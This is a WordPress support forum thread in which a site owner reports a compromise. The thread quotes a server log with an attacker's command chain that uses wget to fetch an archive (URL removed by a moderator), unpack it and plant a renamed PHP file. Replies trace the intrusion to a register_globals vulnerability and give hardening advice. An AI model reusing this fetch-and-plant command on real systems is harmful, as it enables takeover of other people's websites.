Hacked

  • ratinski

    (@ratinski)


    20 years, 9 months ago

    I received the following email from my host today:

    We have found a vulnerable php script:

    server: server1.whitedns.com
    account: hyoutei
    domain: hyoutei.org
    called URL: http://hyoutei.org/index.php
    executed commands:
    cd /home/brillian/public_html/images ;wget
    [MOD: URL REMOVED zxvf zclass.tgz;mv
    zclass.php z.php;rm -fr zclass.tgz

    They further stated that someone attempted to install malware, and showed me their server logs:

    Aug 13 04:28:13 server1 httpd: EW_EXEC_DENY: IP FILE(/home/hyoutei/public_html/index.php) EXEC(cd /home/brillian/public_html/images ;wget [ MOD: URL REMOVED ] zxvf zclass.tgz;mv zclass.php z.php;rm -fr zclass.tgz) URI(/)

    They told me to contact the developers/check support here at WordPress. Anyone have any advice? Please?

Viewing 8 replies - 1 through 8 (of 8 total)
  • skippy

    (@skippy)

    20 years, 9 months ago

    I removed the URL to said malware. No sense showing other script kiddies where to find this junk.

    Tell us about your WordPress installation. What plugins did you use? How many authors did you have?

    Interesting to note that the perpetrator tried to change from your directory to a different user’s home directory.

    userx

    (@userx)

    20 years, 9 months ago

    <meta name=”generator” content=”WordPress 1.2″ />

    – Would this be the problem?

    Mark (podz)

    (@podz)

    20 years, 9 months ago

    The URL above links to <meta name="generator" content="WordPress 1.5.1.3" />

    mpsmyth

    (@mpsmyth)

    20 years, 9 months ago

    Could be the new vulnerability posted two days ago…

    http://secunia.com/advisories/16386/

    Moderator James Huff

    (@macmanx)

    20 years, 9 months ago

    In regards to the security vulnerability that Mpsmyth posted, please read these:

    http://ww.wp.xz.cn/support/topic/41774#post-234660

    http://ww.wp.xz.cn/support/topic/41464#post-233351

    skippy

    (@skippy)

    20 years, 9 months ago

    I am in contact with ratinski, and working to determing how the attack occured.

    Please remain calm. Getting alarmed and making wild speculation will do more harm than good. The information provided in the original post only shows what the perpetrator did once they had access. It does not show how that access was obtained. I have requested additional log data, and will review it as soon as I can.

    Until then, please remember to keep security in mind. Use strong passwords. Read up on hardening wordpress. Don’t share your login details with anyone. Don’t log into your blog from a public computer, or over an unsecured wireless network. Backup regularly.

    mpsmyth

    (@mpsmyth)

    20 years, 9 months ago

    Thanks… I hadn’t been able to find those with the search. Happy now.

    skippy

    (@skippy)

    20 years, 9 months ago

    After a review of the server logs, it seems pretty clear that the site was compromised by means of the register_globals vulnerability.

    perl and PHP code exists to automate the attack, allowing the attacker to run arbitrary code on the victim’s account.

    I’m creating a new thread detailing this issue, and I’ll probably make it sticky. Stay tuned.

Viewing 8 replies - 1 through 8 (of 8 total)

The topic ‘Hacked’ is closed to new replies.